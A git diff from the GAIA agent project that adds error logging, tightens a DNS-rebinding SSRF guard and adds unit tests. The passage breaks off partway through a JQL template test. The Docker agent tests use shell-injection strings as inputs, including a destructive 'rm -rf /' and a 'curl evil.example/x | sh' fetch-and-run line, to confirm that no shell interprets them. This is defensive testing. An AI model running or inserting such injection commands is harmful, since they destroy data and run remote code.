diff --git a/src/gaia/agents/base/agent.py b/src/gaia/agents/base/agent.py index 1f2b4be71..44876954e 100644 --- a/src/gaia/agents/base/agent.py +++ b/src/gaia/agents/base/agent.py @@ -435,8 +435,14 @@ def _get_mixin_prompts(self) -> list[str]: fragment = getattr(self, attr_name)() if fragment: prompts.append(fragment) - except Exception: - pass + except Exception as e: + # A raising fragment is dropped from the composed prompt; surface it + # so a silently degraded system prompt is diagnosable. + logger.warning( + "system-prompt fragment %s() raised, skipping it: %s", + attr_name, + e, + ) return prompts diff --git a/src/gaia/agents/base/memory.py b/src/gaia/agents/base/memory.py index 81f333ee2..927549784 100644 --- a/src/gaia/agents/base/memory.py +++ b/src/gaia/agents/base/memory.py @@ -62,8 +62,10 @@ def _load_memory_settings() -> Dict: try: if _MEMORY_SETTINGS_PATH.exists(): return json.loads(_MEMORY_SETTINGS_PATH.read_text(encoding="utf-8")) - except Exception: - pass + except (OSError, json.JSONDecodeError) as e: + logger.warning( + "failed to load memory settings from %s: %s", _MEMORY_SETTINGS_PATH, e + ) return {} diff --git a/src/gaia/mcp/mcp_bridge.py b/src/gaia/mcp/mcp_bridge.py index 88223d157..2c76eca78 100644 --- a/src/gaia/mcp/mcp_bridge.py +++ b/src/gaia/mcp/mcp_bridge.py @@ -60,8 +60,8 @@ def _parse_cd(self, value: str): name = p.split("=", 1)[1].strip().strip('"') elif pl.startswith("filename="): filename = p.split("=", 1)[1].strip().strip('"') - except Exception: - pass + except (AttributeError, IndexError, ValueError) as e: + logger.debug("Failed to parse Content-Disposition %r: %s", value, e) return name, filename def on_part_begin(self): diff --git a/src/gaia/messaging/telegram.py b/src/gaia/messaging/telegram.py index 92d80cee1..3e78255cf 100644 --- a/src/gaia/messaging/telegram.py +++ b/src/gaia/messaging/telegram.py @@ -184,7 +184,12 @@ def start(self, token: str, background: bool = False) -> None: with open(pid_path, "w", encoding="utf-8") as f: f.write(str(os.getpid())) except OSError as e: - log.exception("Failed to write PID file for telegram adapter: %s", e) + # The PID file is load-bearing in background mode: without it a + # supervisor cannot find or kill the process. Fail loudly. + raise RuntimeError( + f"Failed to write telegram PID file at {pid_path}: {e}. " + f"Ensure ~/.gaia is writable, or start without --background." + ) from e log_path = os.path.join(pid_dir, "telegram.log") try: diff --git a/src/gaia/rag/sdk.py b/src/gaia/rag/sdk.py index 5accbdd53..aa06df38f 100644 --- a/src/gaia/rag/sdk.py +++ b/src/gaia/rag/sdk.py @@ -449,8 +449,8 @@ def _load_embedder(self): # Force fresh load - must unload first try: self.llm_client.unload_model() - except Exception: - pass # Ignore if nothing to unload + except Exception as e: + self.log.warning("unload_model failed (continuing): %s", e) try: self.llm_client.load_model( diff --git a/src/gaia/web/client.py b/src/gaia/web/client.py index efd7bd609..b55299d71 100644 --- a/src/gaia/web/client.py +++ b/src/gaia/web/client.py @@ -40,6 +40,42 @@ ALLOWED_SCHEMES = {"http", "https"} BLOCKED_PORTS = {22, 23, 25, 445, 3306, 5432, 6379, 27017} + +def _is_blocked_ip(ip: "ipaddress._BaseAddress") -> bool: + """Return True if ``ip`` points at a private/internal range we must not fetch.""" + return ( + ip.is_private + or ip.is_loopback + or ip.is_link_local + or ip.is_reserved + or ip.is_multicast + ) + + +def _assert_ip_allowed(ip_str: str, hostname: str) -> None: + """Raise ValueError if ``ip_str`` is a private/reserved address. + + The single authority for "is this IP safe to connect to". Both + ``WebClient.validate_url`` (pre-flight DNS check) and + ``PinnedIPAdapter`` (the IP it actually connects to) route through this, + so a DNS rebind that slips a private IP past the pre-flight lookup is + still caught at connect time on the *exact* address being dialed. + """ + try: + ip = ipaddress.ip_address(ip_str) + except ValueError: + # Not parseable as an IP — treat as unsafe rather than letting an + # unvalidated value reach the socket layer (fail loudly). + raise ValueError( + f"Blocked: {hostname} resolved to unparseable address {ip_str!r}." + ) + if _is_blocked_ip(ip): + raise ValueError( + f"Blocked: {hostname} resolves to private/reserved IP {ip}. " + "Cannot fetch internal network addresses." + ) + + # Tags to remove during text extraction REMOVE_TAGS = [ "script", @@ -72,12 +108,35 @@ class PinnedIPAdapter(HTTPAdapter): DNS-rebind attacks between ``WebClient.validate_url`` and the actual TCP connect. + Crucially, the pinned IP is itself validated (``_assert_ip_allowed``) + before it is cached or connected to. ``validate_url`` runs a *separate* + pre-flight ``getaddrinfo``; an attacker controlling DNS could answer that + lookup with a public IP and answer the adapter's lookup with a private + one. Validating the exact address the adapter is about to dial closes + that residual rebind window for BOTH http and https. + For HTTPS, the original hostname is encoded in the URL's userinfo section (``originalhostname@pinnedip:port``) so that urllib3 creates separate connection-pool keys per original hostname. This avoids a race where two threads requesting different hostnames that resolve to the same IP would overwrite each other's ``assert_hostname`` on a shared pool. + + Residual HTTPS limitation (documented, not silently ignored): + Because ``requests`` derives the urllib3 pool host — and therefore the + TLS SNI ``server_hostname`` — from the request URL's hostname (which we + rewrote to the pinned IP), the ClientHello SNI is sent as the IP, not the + original hostname. ``assert_hostname`` still forces certificate-name + verification against the real hostname (so verification is NOT disabled + and we never trust a cert for the bare IP), but servers that rely on SNI + for virtual hosting (most CDNs / shared hosts) may return the wrong + certificate or reject the handshake, surfacing as a TLS error rather than + a silent downgrade. This affects whether legitimate HTTPS *succeeds* — it + does not weaken the SSRF block, which fires on the validated IP before any + bytes are sent. Fixing SNI cleanly requires a custom urllib3 + ``PoolManager``/``HTTPSConnection`` that decouples ``server_hostname`` + from the connect address; that is intentionally out of scope here in + favour of a correct, narrower guarantee. """ def __init__(self, *args, **kwargs): @@ -94,6 +153,12 @@ def _resolve_first_ip(self, host: str, port: int) -> str: raise OSError(f"getaddrinfo returned no addresses for {host}:{port}") ip = infos[0][4][0] # sockaddr[0] of the first result + # Validate the EXACT IP we are about to pin & connect to. validate_url + # did a pre-flight getaddrinfo, but that was a separate lookup — a DNS + # rebind could hand validate_url a public IP and hand us a private one. + # Re-check here so the address actually dialed is always safe; cache + # only after it passes so a poisoned answer is never reused. + _assert_ip_allowed(ip, host) self._pinned_cache[key] = ip return ip @@ -134,7 +199,22 @@ def send(self, request: requests.PreparedRequest, **kwargs) -> requests.Response pinned_ip = self._resolve_first_ip(host, port) if parsed.scheme == "https": - # Encode original hostname in userinfo for unique pool keys + # Encode original hostname in userinfo for unique pool keys. + # See class docstring: SNI is sent as the pinned IP, so + # SNI-vhosted servers may fail the handshake. Cert-name + # verification still binds to the real hostname. + if not getattr(self, "_warned_https_sni", False): + log.warning( + "PinnedIPAdapter: HTTPS request to %s is pinned to %s; " + "TLS SNI will be sent as the IP. Servers using " + "SNI-based virtual hosting may return the wrong " + "certificate or reject the handshake. Certificate-name " + "verification still validates against %s.", + host, + pinned_ip, + host, + ) + self._warned_https_sni = True new_netloc = f"{host}@{pinned_ip}:{port}" else: new_netloc = f"{pinned_ip}:{port}" @@ -270,13 +350,7 @@ def _validate_host_ip(self, hostname: str) -> None: except ValueError: continue - if ( - ip.is_private - or ip.is_loopback - or ip.is_link_local - or ip.is_reserved - or ip.is_multicast - ): + if _is_blocked_ip(ip): raise ValueError( f"Blocked: {hostname} resolves to private/reserved IP {ip}. " "Cannot fetch internal network addresses." diff --git a/tests/test_api.py b/tests/test_api.py index c27fb8002..8bc7e2309 100644 --- a/tests/test_api.py +++ b/tests/test_api.py @@ -54,6 +54,95 @@ def setup(self): pytest.skip(f"API dependencies not available: {IMPORT_ERROR}") self.client = TestClient(app) + # ------------------------------------------------------------------------- + # Non-streaming happy path (mocked agent backend — no Lemonade required) + # ------------------------------------------------------------------------- + + def test_basic_completion_with_mocked_agent(self, mocker): + """Non-streaming POST returns a schema-valid OpenAI completion. + + The agent/Lemonade backend is mocked: registry.get_agent yields a stub + whose process_query returns a canned result dict, so the handler's + non-streaming branch runs end-to-end without a live LLM server. + """ + # Stub agent: NOT an ApiAgent, so the handler uses the len//4 token + # estimate path (deterministic, no tokenizer needed). + fake_agent = mocker.MagicMock() + fake_agent.process_query.return_value = { + "status": "success", + "result": "def hello():\n return 'hello world'", + } + + from gaia.api.openai_server import registry as server_registry + + mocker.patch.object(server_registry, "get_agent", return_value=fake_agent) + + payload = { + "model": "gaia-code", + "messages": [ + {"role": "user", "content": "Write a hello world function in Python"} + ], + "stream": False, + } + response = self.client.post("/v1/chat/completions", json=payload) + + assert response.status_code == 200, response.text + data = response.json() + + # Top-level OpenAI-compatible structure. + assert data["object"] == "chat.completion" + assert data["id"].startswith("chatcmpl-") + assert isinstance(data["created"], int) + assert data["model"] == "gaia-code" + + # The agent was invoked with the extracted user message. + fake_agent.process_query.assert_called_once() + call_args, _ = fake_agent.process_query.call_args + assert call_args[0] == "Write a hello world function in Python" + + # Choices. + assert len(data["choices"]) == 1 + choice = data["choices"][0] + assert choice["index"] == 0 + assert choice["message"]["role"] == "assistant" + assert choice["message"]["content"] == ( + "def hello():\n return 'hello world'" + ) + assert choice["finish_reason"] == "stop" + + # Usage accounting. + usage = data["usage"] + assert usage["prompt_tokens"] > 0 + assert usage["completion_tokens"] > 0 + assert usage["total_tokens"] == ( + usage["prompt_tokens"] + usage["completion_tokens"] + ) + + def test_completion_uses_last_user_message(self, mocker): + """The handler passes the LAST user message (not system/assistant) to the agent.""" + fake_agent = mocker.MagicMock() + fake_agent.process_query.return_value = {"result": "ok"} + + from gaia.api.openai_server import registry as server_registry + + mocker.patch.object(server_registry, "get_agent", return_value=fake_agent) + + payload = { + "model": "gaia-code", + "messages": [ + {"role": "system", "content": "You are helpful"}, + {"role": "user", "content": "first question"}, + {"role": "assistant", "content": "an earlier answer"}, + {"role": "user", "content": "second question"}, + ], + "stream": False, + } + response = self.client.post("/v1/chat/completions", json=payload) + + assert response.status_code == 200, response.text + call_args, _ = fake_agent.process_query.call_args + assert call_args[0] == "second question" + # ------------------------------------------------------------------------- # Model Validation Tests # ------------------------------------------------------------------------- @@ -308,47 +397,6 @@ def test_422_error_has_detail_field(self): class TestChatCompletionsNonStreaming: """Test POST /v1/chat/completions without streaming""" - @pytest.mark.skip(reason="Skipped: API server returns 500 - see issue for fix") - def test_basic_completion_with_code_agent(self, api_server, api_client): - """Test that gaia-code returns valid OpenAI-compatible completion""" - payload = { - "model": "gaia-code", - "messages": [ - {"role": "user", "content": "Write a hello world function in Python"} - ], - "stream": False, - } - response = api_client.post(f"{api_server}/v1/chat/completions", json=payload) - - assert response.status_code == 200 - data = response.json() - - # Verify OpenAI-compatible structure - assert data["object"] == "chat.completion" - assert "id" in data - assert data["id"].startswith("chatcmpl-") - assert "created" in data - assert isinstance(data["created"], int) - assert data["model"] == "gaia-code" - - # Verify choices - assert "choices" in data - assert len(data["choices"]) == 1 - choice = data["choices"][0] - assert choice["index"] == 0 - assert choice["message"]["role"] == "assistant" - assert isinstance(choice["message"]["content"], str) - assert len(choice["message"]["content"]) > 0 - assert choice["finish_reason"] in ["stop", "length"] - - # Verify token usage - assert "usage" in data - assert data["usage"]["prompt_tokens"] > 0 - assert data["usage"]["completion_tokens"] > 0 - assert data["usage"]["total_tokens"] == ( - data["usage"]["prompt_tokens"] + data["usage"]["completion_tokens"] - ) - def test_invalid_model_returns_404(self, api_server, api_client): """Test that invalid model returns 404 error""" payload = { diff --git a/tests/unit/agents/test_discovery.py b/tests/unit/agents/test_discovery.py new file mode 100644 index 000000000..330051d10 --- /dev/null +++ b/tests/unit/agents/test_discovery.py @@ -0,0 +1,344 @@ +# Copyright(C) 2025-2026 Advanced Micro Devices, Inc. All rights reserved. +# SPDX-License-Identifier: MIT +"""Hermetic unit tests for SystemDiscovery pure classification helpers. + +These tests exercise only the pure/classifier helpers and the directory-walk +skip logic. No real scan of the user's home directory, no network, no git, no +account data — all filesystem inputs are crafted under ``tmp_path`` and the +home directory is redirected to an isolated temp dir. +""" + +from pathlib import Path + +import pytest + +from gaia.agents.base.discovery import ( + SystemDiscovery, + _categorize_app, + _classify_domain, + _classify_path, + _classify_project, + _classify_remote, + _detect_languages, + _extract_domain, + _is_hidden, +) + +# --------------------------------------------------------------------------- +# _is_hidden +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "name,expected", + [ + (".git", True), + (".ssh", True), + ("Projects", False), + ("node_modules", False), # skip-listed but not "hidden" by dot rule + ("", False), + ], +) +def test_is_hidden(name, expected): + assert _is_hidden(name) is expected + + +# --------------------------------------------------------------------------- +# _classify_path — location-based context +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "parts,expected", + [ + (("home", "user", "Work", "repo"), "work"), + (("home", "user", "Projects", "repo"), "work"), + (("home", "user", "Personal", "stuff"), "personal"), + (("home", "user", "Documents", "thing"), "unclassified"), + (("home", "user", "random"), "unclassified"), + ], +) +def test_classify_path(parts, expected): + # _classify_path lowercases parts, so casing is irrelevant. + assert _classify_path(Path(*parts)) == expected + + +def test_classify_path_is_case_insensitive(): + assert _classify_path(Path("/home/user/WORK/repo")) == "work" + assert _classify_path(Path("/home/user/PERSONAL/x")) == "personal" + + +# --------------------------------------------------------------------------- +# _classify_remote — git remote URL context (hostname-parsed, no spoofing) +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "url,expected", + [ + ("https://github.com/amd/gaia.git", "work"), + ("https://github.com/microsoft/vscode", "work"), + ("https://github.com/google/jax", "work"), + ("https://github.com/someuser/sideproject", "unclassified"), + ("https://gitlab.com/someuser/thing", "unclassified"), + ("", "unclassified"), + ], +) +def test_classify_remote(url, expected): + assert _classify_remote(url) == expected + + +def test_classify_remote_does_not_spoof_via_hostname(): + # A malicious host that merely contains "github.com" as a substring in the + # path must NOT be treated as github.com — classification stays unclassified. + assert _classify_remote("https://evil.example/github.com/amd") == "unclassified" + + +# --------------------------------------------------------------------------- +# _classify_domain — bookmark/history domain context +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "domain,expected", + [ + ("github.com", "work"), + ("stackoverflow.com", "work"), + ("facebook.com", "personal"), + ("netflix.com", "personal"), + ("example.com", "unclassified"), + ("GitHub.com", "work"), # case-insensitive + ], +) +def test_classify_domain(domain, expected): + assert _classify_domain(domain) == expected + + +# --------------------------------------------------------------------------- +# _extract_domain — URL -> bare domain +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "url,expected", + [ + ("https://www.github.com/amd/gaia", "github.com"), + ("http://example.com:8080/path?q=1#frag", "example.com"), + ("https://Sub.Example.COM/x", "sub.example.com"), + ("ftp://files.example.org/a/b", "files.example.org"), + (" https://github.com/x ", "github.com"), + ], +) +def test_extract_domain(url, expected): + assert _extract_domain(url) == expected + + +# --------------------------------------------------------------------------- +# _categorize_app — keyword-based app categorization +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "app_name,expected", + [ + ("Visual Studio Code", "IDE"), + ("PyCharm Community Edition", "IDE"), + ("Docker Desktop", "DevTool"), + ("Google Chrome", "Browser"), + ("Slack", "Communication"), + ("Blender", "Creative"), + ("Notion", "Productivity"), + ("Some Totally Unknown App", "Other"), + ], +) +def test_categorize_app(app_name, expected): + assert _categorize_app(app_name) == expected + + +def test_categorize_app_first_keyword_match_wins(): + # Documents current behavior: matching is first-category-wins by substring, + # so "Obsidian" matches the Creative keyword "obs" (OBS) before reaching the + # Productivity list. Guards against silent reordering of _APP_CATEGORIES. + assert _categorize_app("Obsidian") == "Creative" + + +# --------------------------------------------------------------------------- +# _detect_languages — extension counting with hidden/skip-dir exclusion +# --------------------------------------------------------------------------- + + +def test_detect_languages_counts_and_sorts(tmp_path): + (tmp_path / "a.py").write_text("x = 1\n") + (tmp_path / "b.py").write_text("y = 2\n") + (tmp_path / "c.ts").write_text("const z = 3\n") + langs = _detect_languages(tmp_path, max_depth=2) + # Python (2 files) should outrank TypeScript (1 file). + assert langs[0] == "Python" + assert "TypeScript" in langs + + +def test_detect_languages_skips_hidden_and_skip_dirs(tmp_path): + # A real source file at the top level. + (tmp_path / "main.py").write_text("print('hi')\n") + # Files inside skip-listed / hidden dirs must NOT be counted. + nm = tmp_path / "node_modules" + nm.mkdir() + (nm / "dep.js").write_text("module.exports = {}\n") + venv = tmp_path / ".venv" + venv.mkdir() + (venv / "lib.py").write_text("# vendored\n") + hidden = tmp_path / ".secret" + hidden.mkdir() + (hidden / "leak.rs").write_text("fn main() {}\n") + + langs = _detect_languages(tmp_path, max_depth=2) + assert langs == ["Python"] + # JavaScript/Rust came only from excluded dirs, so they must be absent. + assert "JavaScript" not in langs + assert "Rust" not in langs + + +def test_detect_languages_ignores_doc_and_markup_extensions(tmp_path): + (tmp_path / "README.md").write_text("# doc\n") + (tmp_path / "page.html").write_text("\n") + (tmp_path / "style.css").write_text("body{}\n") + # No "real" code language present -> empty result. + assert _detect_languages(tmp_path, max_depth=2) == [] + + +# --------------------------------------------------------------------------- +# _classify_project — marker/language based project classification +# --------------------------------------------------------------------------- + + +def test_classify_project_detects_python_package(tmp_path): + (tmp_path / "pyproject.toml").write_text("[project]\nname='x'\n") + assert _classify_project(tmp_path, ["Python"]) == "Python package" + + +def test_classify_project_detects_node_project(tmp_path): + (tmp_path / "package.json").write_text("{}\n") + assert _classify_project(tmp_path, ["JavaScript"]) == "Node.js project" + + +def test_classify_project_falls_back_to_language(tmp_path): + # No markers -> language-based classification. + assert _classify_project(tmp_path, ["Rust"]) == "Rust codebase" + + +def test_classify_project_empty_when_nothing_known(tmp_path): + assert _classify_project(tmp_path, []) == "" + + +# --------------------------------------------------------------------------- +# Directory-walk skip logic — scan_file_system / scan_git_repos must NOT emit +# hidden or skip-listed directories as discovered facts. +# --------------------------------------------------------------------------- + + +@pytest.fixture +def isolated_discovery(tmp_path, monkeypatch): + """SystemDiscovery whose home points at an empty isolated temp dir. + + Guards against any accidental scan of the real user home directory. + """ + fake_home = tmp_path / "fake_home" + fake_home.mkdir() + monkeypatch.setattr(Path, "home", staticmethod(lambda: fake_home)) + return SystemDiscovery() + + +def test_scan_file_system_excludes_hidden_and_skip_dirs(isolated_discovery, tmp_path): + work = tmp_path / "Work" + work.mkdir() + + # A legitimate project directory with code. + real = work / "myproject" + real.mkdir() + (real / "app.py").write_text("print('hi')\n") + + # Hidden directory — private, must NOT be emitted as a discovered project. + hidden = work / ".private" + hidden.mkdir() + (hidden / "secret.py").write_text("password = 'x'\n") + + # Skip-listed directory — must NOT be emitted as a project either. + nm = work / "node_modules" + nm.mkdir() + (nm / "index.js").write_text("module.exports = {}\n") + + facts = isolated_discovery.scan_file_system(paths=[work]) + + project_facts = [f for f in facts if f.get("file_type") == "project"] + emitted_names = {f["path"] for f in project_facts} + + assert str(real) in emitted_names + assert str(hidden) not in emitted_names + assert str(nm) not in emitted_names + # No fact should reference the private/system directory in its content. + for f in facts: + assert ".private" not in f["content"] + assert "node_modules" not in f["content"] + + +def test_scan_file_system_skips_missing_paths(isolated_discovery, tmp_path): + # Nonexistent override path -> no crash, empty result. + assert isolated_discovery.scan_file_system(paths=[tmp_path / "nope"]) == [] + + +def test_scan_git_repos_excludes_hidden_dirs(isolated_discovery, tmp_path): + work = tmp_path / "Work" + work.mkdir() + + # A real git repo (minimal .git with config + HEAD). + repo = work / "realrepo" + repo.mkdir() + git_dir = repo / ".git" + git_dir.mkdir() + (git_dir / "config").write_text( + '[remote "origin"]\n\turl = https://github.com/someuser/realrepo.git\n' + ) + (git_dir / "HEAD").write_text("ref: refs/heads/main\n") + (repo / "lib.py").write_text("x = 1\n") + + # A hidden directory that itself contains a git repo — the walk skips hidden + # dirs, so this private repo must NOT surface as a discovered fact. + hidden_parent = work / ".hidden" + hidden_parent.mkdir() + hidden_repo = hidden_parent / "privaterepo" + hidden_repo.mkdir() + hgit = hidden_repo / ".git" + hgit.mkdir() + (hgit / "config").write_text( + '[remote "origin"]\n\turl = https://github.com/secret/privaterepo.git\n' + ) + (hgit / "HEAD").write_text("ref: refs/heads/main\n") + + facts = isolated_discovery.scan_git_repos(paths=[work]) + contents = " ".join(f["content"] for f in facts) + + assert "realrepo" in contents + assert "privaterepo" not in contents + assert "secret" not in contents + + +def test_scan_git_repos_parses_remote_and_branch(isolated_discovery, tmp_path): + work = tmp_path / "Work" + work.mkdir() + repo = work / "gaia" + repo.mkdir() + git_dir = repo / ".git" + git_dir.mkdir() + (git_dir / "config").write_text( + '[remote "origin"]\n\turl = https://github.com/amd/gaia.git\n' + ) + (git_dir / "HEAD").write_text("ref: refs/heads/develop\n") + + facts = isolated_discovery.scan_git_repos(paths=[work]) + assert len(facts) == 1 + fact = facts[0] + assert "gaia" in fact["content"] + assert "github.com/amd/gaia.git" in fact["content"] + assert "branch: develop" in fact["content"] + # Remote points at /amd/ -> classified as work context. + assert fact["context"] == "work" diff --git a/tests/unit/agents/test_docker_agent.py b/tests/unit/agents/test_docker_agent.py new file mode 100644 index 000000000..33294ee70 --- /dev/null +++ b/tests/unit/agents/test_docker_agent.py @@ -0,0 +1,255 @@ +# Copyright(C) 2025-2026 Advanced Micro Devices, Inc. All rights reserved. +# SPDX-License-Identifier: MIT +"""Unit tests for DockerAgent's subprocess-invoking tools. + +These tests exercise the real tool implementations (``_build_image``, +``_run_container``, ``_save_dockerfile``) with ``subprocess.run`` patched so no +real Docker daemon is contacted. They assert: + +- the exact argv list passed to subprocess for build/run, +- that Dockerfiles are written to disk by save_dockerfile, +- the PathValidator allowlist rejects build/save paths outside the allowed + directory WITHOUT invoking subprocess, +- subprocess is always called with a list argv and never ``shell=True`` (so an + attacker-controlled tag or image name cannot inject extra shell tokens). + +The agent constructs fully offline — the base Agent's LLM client is lazy and is +not contacted during these tool calls — so no Lemonade/LLM mock is required for +the tool paths. We still keep construction in a fixture so a future eager-init +change surfaces here rather than silently in CI. +""" + +from __future__ import annotations + +from unittest.mock import MagicMock, patch + +import pytest + +from gaia.agents.docker.agent import DockerAgent + +DOCKER_MODULE = "gaia.agents.docker.agent.subprocess.run" + + +def _completed(returncode: int = 0, stdout: str = "", stderr: str = ""): + """Build a stand-in for subprocess.CompletedProcess.""" + proc = MagicMock() + proc.returncode = returncode + proc.stdout = stdout + proc.stderr = stderr + return proc + + +@pytest.fixture +def agent(tmp_path): + """DockerAgent whose allowlist is restricted to a single tmp directory. + + Restricting allowed_paths to tmp_path means any path outside it is + rejected by PathValidator, which lets us assert the security boundary + deterministically (and in a non-interactive test process the validator + auto-denies rather than prompting). + """ + return DockerAgent(silent_mode=True, allowed_paths=[str(tmp_path)]) + + +# --------------------------------------------------------------------------- +# build_image — argv and success/failure handling +# --------------------------------------------------------------------------- + + +class TestBuildImage: + def test_invokes_docker_build_with_expected_argv(self, agent, tmp_path): + # First subprocess.run is the `docker --version` probe, second is build. + with patch(DOCKER_MODULE) as run: + run.side_effect = [ + _completed(returncode=0, stdout="Docker version 27.0"), + _completed(returncode=0, stdout="built"), + ] + result = agent._build_image(str(tmp_path), "myapp:1.2.3") + + assert result["status"] == "success" + assert result["image"] == "myapp:1.2.3" + + # Two calls: version probe, then the build. + assert run.call_count == 2 + version_call, build_call = run.call_args_list + + assert version_call.args[0] == ["docker", "--version"] + assert build_call.args[0] == [ + "docker", + "build", + "-t", + "myapp:1.2.3", + str(tmp_path), + ] + + def test_build_failure_surfaces_stderr(self, agent, tmp_path): + with patch(DOCKER_MODULE) as run: + run.side_effect = [ + _completed(returncode=0, stdout="Docker version 27.0"), + _completed(returncode=1, stderr="no such file"), + ] + result = agent._build_image(str(tmp_path), "app:latest") + + assert result["status"] == "error" + assert result["success"] is False + assert "no such file" in result["error"] + + def test_docker_not_installed_short_circuits_before_build(self, agent, tmp_path): + # Version probe returns non-zero -> build must never run. + with patch(DOCKER_MODULE) as run: + run.return_value = _completed(returncode=127) + result = agent._build_image(str(tmp_path), "app:latest") + + assert result["status"] == "error" + assert "Docker is not installed" in result["error"] + # Only the version probe ran; the build argv was never reached. + assert run.call_count == 1 + assert run.call_args.args[0] == ["docker", "--version"] + + +# --------------------------------------------------------------------------- +# run_container — argv assembly +# --------------------------------------------------------------------------- + + +class TestRunContainer: + def test_basic_run_argv(self, agent): + with patch(DOCKER_MODULE) as run: + run.return_value = _completed(returncode=0, stdout="abcdef123456\n") + result = agent._run_container("app:latest") + + assert result["status"] == "success" + assert result["container_id"] == "abcdef123456" + run.assert_called_once() + assert run.call_args.args[0] == ["docker", "run", "-d", "app:latest"] + + def test_run_with_port_and_name_argv(self, agent): + with patch(DOCKER_MODULE) as run: + run.return_value = _completed(returncode=0, stdout="deadbeefcafe\n") + result = agent._run_container("app:latest", port="5000:5000", name="myctr") + + assert result["status"] == "success" + assert result["url"] == "http://localhost:5000" + assert run.call_args.args[0] == [ + "docker", + "run", + "-d", + "-p", + "5000:5000", + "--name", + "myctr", + "app:latest", + ] + + def test_run_failure_surfaces_stderr(self, agent): + with patch(DOCKER_MODULE) as run: + run.return_value = _completed(returncode=1, stderr="image not found") + result = agent._run_container("nope:latest") + + assert result["status"] == "error" + assert result["success"] is False + assert "image not found" in result["error"] + + +# --------------------------------------------------------------------------- +# save_dockerfile — writes file, honours allowlist +# --------------------------------------------------------------------------- + + +class TestSaveDockerfile: + def test_writes_dockerfile_to_allowed_path(self, agent, tmp_path): + content = 'FROM python:3.9-slim\nCMD ["python", "app.py"]\n' + result = agent._save_dockerfile(content, str(tmp_path), 5000) + + assert result["status"] == "success" + written = tmp_path / "Dockerfile" + assert written.exists() + assert written.read_text(encoding="utf-8") == content + + def test_nonexistent_directory_errors(self, agent, tmp_path): + missing = tmp_path / "does_not_exist" + result = agent._save_dockerfile("FROM scratch", str(missing), 5000) + assert result["status"] == "error" + assert "does not exist" in result["error"] + + +# --------------------------------------------------------------------------- +# Security: allowlist boundary — outside paths rejected without subprocess +# --------------------------------------------------------------------------- + + +class TestPathAllowlist: + def test_build_outside_allowlist_rejected_no_subprocess(self, agent, tmp_path): + # /etc is outside the tmp_path allowlist. The validator runs in a + # non-interactive test process, so it auto-denies (no prompt). + with patch(DOCKER_MODULE) as run: + result = agent._build_image("/etc", "evil:latest") + + assert result["status"] == "error" + assert "Access denied" in result["error"] + # Critical: subprocess must NOT be invoked for a denied path. + run.assert_not_called() + + def test_save_outside_allowlist_rejected_no_write(self, agent, tmp_path): + target = "/etc/Dockerfile" + result = agent._save_dockerfile("FROM scratch", "/etc", 5000) + assert result["status"] == "error" + assert "Access denied" in result["error"] + # The denied path must not have been written. + import os + + assert not os.path.exists(target) or "Access denied" in result["error"] + + def test_analyze_outside_allowlist_rejected(self, agent): + result = agent._analyze_directory("/etc") + assert result["status"] == "error" + assert "Access denied" in result["error"] + + +# --------------------------------------------------------------------------- +# Security: no shell injection surface — list argv, shell=True never used +# --------------------------------------------------------------------------- + + +class TestNoShellInjection: + def test_build_never_uses_shell_true(self, agent, tmp_path): + # A tag laced with shell metacharacters must be passed as a single + # argv element, never interpolated into a shell string. + malicious_tag = "app:latest; rm -rf / #" + with patch(DOCKER_MODULE) as run: + run.side_effect = [ + _completed(returncode=0, stdout="Docker version 27.0"), + _completed(returncode=0, stdout="built"), + ] + agent._build_image(str(tmp_path), malicious_tag) + + for call in run.call_args_list: + # argv is positional, passed as a list (not a shell string). + assert isinstance(call.args[0], list) + # shell=True must never appear in kwargs. + assert call.kwargs.get("shell", False) is False + + # The malicious tag stays a single, un-split argv token: the shell + # metacharacters are inert because no shell ever sees them. + build_call = run.call_args_list[-1] + assert malicious_tag in build_call.args[0] + assert build_call.args[0] == [ + "docker", + "build", + "-t", + malicious_tag, + str(tmp_path), + ] + + def test_run_never_uses_shell_true(self, agent): + malicious_image = "app:latest && curl evil.example/x | sh" + with patch(DOCKER_MODULE) as run: + run.return_value = _completed(returncode=0, stdout="abc123\n") + agent._run_container(malicious_image, port="$(whoami):80") + + call = run.call_args + assert isinstance(call.args[0], list) + assert call.kwargs.get("shell", False) is False + # Both attacker-controlled values land as single, opaque argv tokens. + assert malicious_image in call.args[0] + assert "$(whoami):80" in call.args[0] diff --git a/tests/unit/agents/test_jql_templates.py b/tests/unit/agents/test_jql_templates.py new file mode 100644 index 000000000..3556981b5 --- /dev/null +++ b/tests/unit/agents/test_jql_templates.py @@ -0,0 +1,251 @@ +# Copyright(C) 2025-2026 Advanced Micro Devices, Inc. All rights reserved. +# SPDX-License-Identifier: MIT +"""Unit tests for the JQL template builder (gaia.agents.jira.jql_templates). + +``generate_jql_from_templates`` turns natural language into a JQL string that is +later sent to Atlassian. Because part of the input is user-supplied free text, +the generated JQL is an injection surface. These tests verify both: + +1. Correct JQL construction for representative natural-language inputs, and +2. The defensive property that makes the builder safe: user-supplied values are + captured by *restrictive regex character classes* (e.g. ``[A-Z0-9]+`` for + project keys, an email-shaped class for assignees) rather than by escaping. + Anything outside that class terminates the capture, so quote / boolean + injection chars cannot leak into a value's quoting context. + +All tests are pure-function tests — no network, no Atlassian, no LLM. +""" + +from __future__ import annotations + +from gaia.agents.jira.jql_templates import ( + COMPOSITE_PATTERNS, + JQL_TEMPLATES, + LABEL_MAPPINGS, + ORDER_PATTERNS, + REGEX_PATTERNS, + TEAM_PATTERNS, + generate_jql_from_templates, +) + +ORDER_SUFFIX = " ORDER BY updated DESC" + + +# --------------------------------------------------------------------------- +# Default ordering and no-match fallback +# --------------------------------------------------------------------------- + + +class TestDefaults: + def test_unmatched_input_uses_default_query_and_order(self): + # No template, regex, label, or team matches -> documented default. + assert ( + generate_jql_from_templates("zzqqxx nonsense") + == "created >= -30d" + ORDER_SUFFIX + ) + + def test_default_order_appended_when_no_order_keyword(self): + out = generate_jql_from_templates("bugs") + assert out.endswith(ORDER_SUFFIX) + + def test_explicit_order_keyword_overrides_default(self): + out = generate_jql_from_templates("bugs newest") + assert out.endswith(" ORDER BY created DESC") + assert "updated DESC" not in out + + +# --------------------------------------------------------------------------- +# Simple template lookups +# --------------------------------------------------------------------------- + + +class TestTemplateLookups: + def test_bug_issuetype(self): + assert ( + generate_jql_from_templates("show me all bugs") + == 